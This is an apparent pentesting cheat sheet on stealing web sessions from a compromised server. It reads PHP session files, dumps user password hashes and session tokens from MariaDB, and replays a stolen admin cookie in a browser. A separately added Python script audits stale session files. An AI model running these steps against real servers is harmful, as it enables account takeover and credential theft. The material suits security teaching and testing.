SESSION HIJACKING
session identifiers and session data can be retrieved from a web server's disk or memory once an attacker has compromised the server. although more impactful actions can be taken at that point, this post-exploitation method still has value because harvested sessions can be reused in future attacks.
WEB SERVER ACCESS
PHP
root@target:~$ locate php.ini
/etc/php/7.4/apache2/php.ini
/etc/php/7.4/cli/php.ini
...
root@target:~$ cat /etc/php/7.4/cli/php.ini | grep 'session.save_path'
;session.save_path = "N;/path"
;session.save_path = "N;MODE;/path"
;session.save_path = "/var/lib/php/sessions"
root@target:~$ cat /etc/php/7.4/apache2/php.ini | grep 'session.save_path'
;session.save_path = "N;/path"
;session.save_path = "N;MODE;/path"
;session.save_path = "/var/lib/php/sessions"
* note that a victim must be authenticated (have an active session) before a session identifier exists on the server for an attacker to find
* the session files follow the naming convention sess_<sessionID>
- the same PHP session identifier, viewed in the browser, may look like...
Name: PHPSESSID Value: s6kitq8d3071rmvbfitpim9mm Domain: 192.. Path: /
- the same PHP session identifier, viewed on the web server, may look like...
sess_s6kitq8d3071rmvbfitpim9mm
root@target:~$ ls /var/lib/php/sessions
sess_s6kitq8d3071rmvbfitpim9mm
root@target:~$ cat //var/lib/php/sessions/sess_s6kitq8d3071rmvbfitpim9mm
username|s:5:"admin";
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
Name: PHPSESSID
Value: s6kitq8d3071rmvbfitpim9mm
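the file contents shown above are PHP's default "php" save handler format (key|serialized value pairs), and every sess_* file that outlives session.gc_maxlifetime is a live credential sitting on disk. the script below is an added example, not part of the original notes: it decodes that format and reports session files the garbage collector should already have removed. it assumes file-based sessions, the default gc_maxlifetime of 1440 seconds, and uses a constructed sample session directory.

```python
import os
import tempfile
import time

# Decode one scalar in PHP's serialize() format starting at text[pos] and
# return (value, new_pos); integers, booleans and strings cover most $_SESSION data.
def unserialize(text, pos=0):
    kind = text[pos]
    if kind in "ib":  # integer or boolean, e.g. i:3; or b:1;
        end = text.index(";", pos)
        return int(text[pos + 2:end]), end + 1
    if kind == "s":  # string with its byte length, e.g. s:5:"admin";
        colon = text.index(":", pos + 2)
        start = colon + 2
        end = start + int(text[pos + 2:colon])
        return text[start:end], end + 2
    raise ValueError(f"unsupported type {kind!r} at offset {pos}")

# Decode a file written by PHP's default "php" save handler: key|value pairs.
def decode_session(text):
    data, pos = {}, 0
    while pos < len(text):
        bar = text.index("|", pos)
        data[text[pos:bar]], pos = unserialize(text, bar + 1)
    return data

# Report sess_* files in save_path older than session.gc_maxlifetime seconds
# that the collector has not removed: (session id, age in seconds, stored keys).
def stale_sessions(save_path, gc_maxlifetime=1440, now=None):
    now = time.time() if now is None else now
    stale = []
    for name in sorted(n for n in os.listdir(save_path) if n.startswith("sess_")):
        full = os.path.join(save_path, name)
        age = int(now - os.path.getmtime(full))
        if age > gc_maxlifetime:
            with open(full, encoding="latin-1") as f:  # lengths are byte counts
                stale.append((name[5:], age, sorted(decode_session(f.read()))))
    return stale

# Constructed sample save_path: one fresh session, one that GC should have removed.
def build_sample_dir(now):
    path = tempfile.mkdtemp()
    samples = [("fresh0001", 'username|s:5:"admin";', 60),
               ("stale0002", 'username|s:4:"john";is_admin|b:0;', 7200)]
    for sid, content, age in samples:
        full = os.path.join(path, "sess_" + sid)
        with open(full, "w", encoding="latin-1") as f:
            f.write(content)
        os.utime(full, (now - age, now - age))  # push mtime back by `age`
    return path
```

point stale_sessions() at the real session.save_path from php.ini to run it on a server; a non-empty result means the garbage collector is not keeping up (on Debian-style setups GC runs from cron rather than from PHP itself).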
JAVA
on java, the default session data file is named SESSIONS.ser
.NET
.net session identifiers and session data are stored in one of the following locations (more in-depth details: Introduction To ASP.NET Sessions)
- the application worker process (aspnet_wp.exe) - this is the case in the InProc session mode
- StateServer (a Windows service residing on IIS or a separate server) - this is the case in the OutProc session mode
- an SQL Server
DATABASE ACCESS
this method can also be carried out through a SQL injection vulnerability instead of shell access on the server
root@target:~$
MariaDB [(none)]> show databases;
+----------+
| Database |
+----------+
| project  |
| ...      |
+----------+
MariaDB [(none)]> use project;
...
MariaDB [project]> show tables;
+----------+
| Database |
+----------+
| sessions |
| users    |
| ...      |
+----------+
MariaDB [project]> select * from users;
+----+----------+-------------------+----------------------------------+
| id | username | email             | password                         |
+----+----------+-------------------+----------------------------------+
|  1 | test     | [email protected] | 098f6bcd4621d373cade4e832627b4f6 |
|  2 | admin    | [email protected] | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+-------------------+----------------------------------+
* these hashes will take time to crack
MariaDB [project]> select * from all_sessions;
+----+-------------------+-------------------------+
| id | name              | session                 |
+----+-------------------+-------------------------+
|  1 | John              | Johnsspecialh4x0rc00kie |
|  2 | Ben               | Benssup3rs3cretc00kie   |
|  3 | Developer (admin) | develop3rl33tsp00ks     |
+----+-------------------+-------------------------+
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
Name: PHPSESSID
Value: develop3rl33tsp00ks